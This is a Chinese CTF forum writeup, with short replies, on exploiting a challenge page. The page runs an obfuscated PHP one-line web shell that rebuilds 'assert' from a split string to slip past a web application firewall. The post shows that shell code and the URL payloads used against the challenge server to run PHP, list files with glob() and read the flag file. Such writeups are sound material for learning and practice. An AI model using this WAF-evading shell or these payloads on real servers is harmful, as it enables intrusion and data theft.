CTF论坛 - CTF交流社区

[Writeup] “过狗一句话”解题思路

2017-6-9 22:15
40887
<?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>


上来就给出了一句话   猜想是直接利用一句话   于是构造payload
http://120.24.86.145:8010/index.php?s=phpinfo();
1.png
发现成功执行。于是尝试能否执行cmd命令
http://120.24.86.145:8010/index.php?s=system('ls');
发现返回空白页面  没有任何信息说明执行失败,这里猜想是权限被控制了于是用另一种方法来读取文件
http://120.24.86.145:8010/index.php?s=print_r(glob('*.php'));  
2.png
发现只回显了一个index.php页面于是修改后缀
http://120.24.86.145:8010/index.php?s=print_r(glob('*.txt')); 发现有一个txt文件于是尝试读取
3.png
http://120.24.86.145:8010/index.php?s=show_source('ds231e.txt');
成功getflag
这里可以用其他方式读取 :
var_dump(file("./ds231e.txt"));
print_r(file("./ds231e.txt"));

注:glob() 函数返回匹配指定模式的文件名或目录。该函数返回一个包含有匹配文件 / 目录的数组。




分享到 :
0 人收藏

7 个回复

倒序浏览
yy-yy   | 2017-6-9 23:12:39
提示: 作者被禁止或删除 内容自动屏蔽
yy-yy   | 2017-6-9 23:17:53
提示: 作者被禁止或删除 内容自动屏蔽
Be_easy  版主 | 2017-6-16 07:37:19
为表哥递茶
tinyfisher  初入江湖 | 2017-7-26 10:39:40
可以用菜刀连吗
sccdlth  版主 | 2017-7-31 17:05:21
大佬~ 我是getshell之后才找到的flag~
whereisflag   | 2018-6-2 15:54:11
提示: 作者被禁止或删除 内容自动屏蔽
Mr.轻熟男  初入江湖 | 2019-1-16 10:25:14
给大佬倒水~~
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Powered by Bugku! X3.4 © 2017 CTFbbs.

返回顶部